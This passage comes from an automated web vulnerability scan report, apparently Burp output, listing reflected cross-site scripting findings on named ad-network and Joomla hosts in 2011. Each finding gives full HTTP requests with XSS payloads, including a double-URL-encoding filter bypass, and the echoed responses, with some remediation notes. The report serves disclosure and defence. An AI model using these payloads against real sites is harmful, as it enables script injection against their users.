document.cookie = idx_cVal + ';expires=' + idx_cTime + ';domain=' + zd_domain + ';path=/;';
} else {
document.wri
...[SNIP]...

4.54. http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://c5.zedo.com
Path:   //ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6117'%3b9e9d8ef0603 was submitted in the REST URL parameter 8. This input was echoed as a6117';9e9d8ef0603 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/886284/2333/172/0/305002290/305002290a6117'%3b9e9d8ef0603//0/305/788//2000004/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFgeo=5386156; FFcat=305,2290,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 1041405764
Cache-Control: max-age=2592000
Expires: Wed, 23 Feb 2011 21:59:22 GMT
Date: Mon, 24 Jan 2011 21:59:22 GMT
Connection: close
Content-Length: 5232


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
Date();
idx_expiry_date.setTime(idx_expiry_date.getTime() + (30*24*60*60*1000));
var idx_cTime = idx_expiry_date.toGMTString();
var idx_cVal = 'PI=' + 'h749620Za886284' + 'Zc' + '305002290%2C305002290a6117';9e9d8ef0603' + 'Zs' + zzIdxSection + 'Zt' + age
if(document.domain.match(zd_domain)){
document.cookie = idx_cVal + ';expires=' + idx_cTime + ';domain=' + zd_domain + ';path=/;';
} else {
document.write('<scr' +
...[SNIP]...

4.55. http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [monid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.joomla.org
Path:   /megamenu/css/maximenuH_CK.php

Issue detail

The value of the monid request parameter is copied into the HTML document as plain text between tags. The payload 30c50<img%20src%3da%20onerror%3dalert(1)>dcee7b8ef2c was submitted in the monid parameter. This input was echoed as 30c50<img src=a onerror=alert(1)>dcee7b8ef2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /megamenu/css/maximenuH_CK.php?monid=maximenuCK30c50<img%20src%3da%20onerror%3dalert(1)>dcee7b8ef2c HTTP/1.1
Host: cdn.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:56:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=300, must-revalidate
Content-Type: text/css
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
X-Cache: MISS from cdce-nym011-011.nym011.internap.com
Via: 1.1 cdce-nym011-010.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-011.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close


.clr {clear:both;}

/**
** global styles
**/

/* container style */
div#maximenuCK30c50<img src=a onerror=alert(1)>dcee7b8ef2c ul.maximenuCK {
background : #ffffff;
height : 38px;
padding : 0;
margin : 0;
float: right;
}

div#maximenuCK30c50<img src=a onerror=alert(1)>
...[SNIP]...

4.56. http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.joomla.org
Path:   /megamenu/css/maximenuH_CK.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c27c2<img%20src%3da%20onerror%3dalert(1)>c3d9b0cd94d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c27c2<img src=a onerror=alert(1)>c3d9b0cd94d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /megamenu/css/maximenuH_CK.php?monid=maxime/c27c2<img%20src%3da%20onerror%3dalert(1)>c3d9b0cd94dnuCK HTTP/1.1
Host: cdn.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:56:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=300, must-revalidate
Content-Type: text/css
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 cdce-nym011-015.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close


.clr {clear:both;}

/**
** global styles
**/

/* container style */
div#maxime/c27c2<img src=a onerror=alert(1)>c3d9b0cd94dnuCK ul.maximenuCK {
background : #ffffff;
height : 38px;
padding : 0;
margin : 0;
float: right;
}

div#maxime/c27c2<img src=a onerror=alert(1)>
...[SNIP]...

4.57. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [btid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13f9"><script>alert(1)</script>11d8993dae5 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fAe13f9"><script>alert(1)</script>11d8993dae5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:29:05 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Tue, 25 Jan 2011 03:57:22 GMT
Pragma: no-cache
Cneonction: close
Nncoection: close
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1379

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fAe13f9"><script>alert(1)</script>11d8993dae5&amp;ei=GOOGLE_CONTENTNETWORK&amp;wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg" />
...[SNIP]...

4.58. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [ei parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2482"><script>alert(1)</script>b4bb50bcb1f was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORKe2482"><script>alert(1)</script>b4bb50bcb1f&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:29:13 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 03:50:58 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1379

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&amp;ei=GOOGLE_CONTENTNETWORKe2482"><script>alert(1)</script>b4bb50bcb1f&amp;wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg" />
...[SNIP]...

4.59. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [rtbhost parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the rtbhost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d85"><script>alert(1)</script>00a8892c12 was submitted in the rtbhost parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.neta6d85"><script>alert(1)</script>00a8892c12&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:28:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Tue, 25 Jan 2011 03:57:22 GMT
Cneonction: close
Nncoection: close
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1378

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.neta6d85"><script>alert(1)</script>00a8892c12/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&amp;ei=GOOGLE_CONTENTNETWORK&
...[SNIP]...

4.60. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [wp_exchange parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a96"><script>alert(1)</script>a129b5a33ed was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg68a96"><script>alert(1)</script>a129b5a33ed&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:29:21 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 03:48:06 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1379

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&amp;ei=GOOGLE_CONTENTNETWORK&amp;wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg68a96"><script>alert(1)</script>a129b5a33ed" />
...[SNIP]...

4.61. http://click.linksynergy.com/fs-bin/click [offerid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 51a66<script>alert(1)</script>c6e752edb23 was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=Xy0hOcdtU4s&offerid=51a66<script>alert(1)</script>c6e752edb23&type=2&subid=0 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 258
Date: Mon, 24 Jan 2011 15:01:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "51a66<script>alert(1)</script>c6e752edb23"
</body>
...[SNIP]...

4.62. http://delb.opt.fimserve.com/fimbid/ [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://delb.opt.fimserve.com
Path:   /fimbid/

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9ab3c<script>alert(1)</script>7a127ff3b25 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fimbid/?cachebuster=1295921111939Gck&cb=window[%22AIIcb%22]9ab3c<script>alert(1)</script>7a127ff3b25&sz=728x90&api=2&enc=1.1&est=b560d84a436c1f260f16c34efa66d8e3&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=2094107610&pcat=29&ck=1&fl=1&d=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110
Date: Tue, 25 Jan 2011 04:30:16 GMT

window["AIIcb"]9ab3c<script>alert(1)</script>7a127ff3b25={"e":{"value":5,"desc":"Timestamp expired"},"mt":60};

4.63. http://developer.joomla.org/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd8e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec304c81e309 was submitted in the REST URL parameter 1. This input was echoed as acd8e"><img src=a onerror=alert(1)>c304c81e309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /aacd8e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec304c81e309 HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/a9be7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec8433896990
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utmz=194671032.1295885228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; 39f24a85b5d169a21046edfe6eaa5320=24d4dc7aa5497203c5eea18807f36bae

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:59:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
X-Content-Encoded-By: Joomla! 1.6
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 8142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/aacd8e"><img src=a onerror=alert(1)>c304c81e309" />
...[SNIP]...

4.64. http://developer.joomla.org/getting-started.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /getting-started.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2f1d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e956a7445bcc was submitted in the REST URL parameter 1. This input was echoed as c2f1d"><img src=a onerror=alert(1)>956a7445bcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /c2f1d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e956a7445bcc HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.18.10.1295890937;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:05 GMT
